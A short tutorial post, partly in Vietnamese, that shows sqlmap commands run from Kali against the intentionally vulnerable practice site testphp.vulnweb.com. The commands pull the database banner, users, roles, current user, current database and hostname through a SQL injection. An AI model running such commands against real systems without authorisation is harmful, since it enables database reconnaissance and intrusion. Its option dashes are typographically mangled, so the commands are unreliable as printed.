Fingerprinting the system and database
Site: http://testphp.vulnweb.com
——

Link bị lỗi SQL Injection: http://testphp.vulnweb.com/search.php?test=query

Get database & DB version.

root@kali:~# sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –b

Get user & role.

root@kali:~# sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –users –roles

Get current user, current database and hostname information.

root@kali:~# sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –current-user –current-db –hostname

Leave a Comment

Your email address will not be published.